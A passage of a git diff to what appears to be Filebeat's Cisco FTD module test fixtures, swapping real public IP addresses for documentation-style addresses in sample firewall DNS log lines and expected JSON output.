- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "12.12.12.12",
+ "source.address": "81.2.69.1452",
+ "source.domain": "81.2.69.1452",
 "tags": [
 "cisco-asa",
 "forwarded"
 ],
- "user.name": "12.12.12.12"
+ "user.name": "81.2.69.1452"
 }
 ]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/ftd/test/dns.log b/x-pack/filebeat/module/cisco/ftd/test/dns.log
index ce15fb2bdfab..ad54f0a5a64a 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/dns.log
+++ b/x-pack/filebeat/module/cisco/ftd/test/dns.log
@@ -1,21 +1,21 @@ -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: 
elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, 
ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, 
ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: 
default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, 
EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: 
AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and 
Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: 
laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, 
ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS 
client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No 
Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter 
Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, 
IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 58082, DstPort: 53, Protocol: 
udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299
diff --git a/x-pack/filebeat/module/cisco/ftd/test/dns.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/dns.log-expected.json
index 900923811c3f..8353ab7bb650 100644
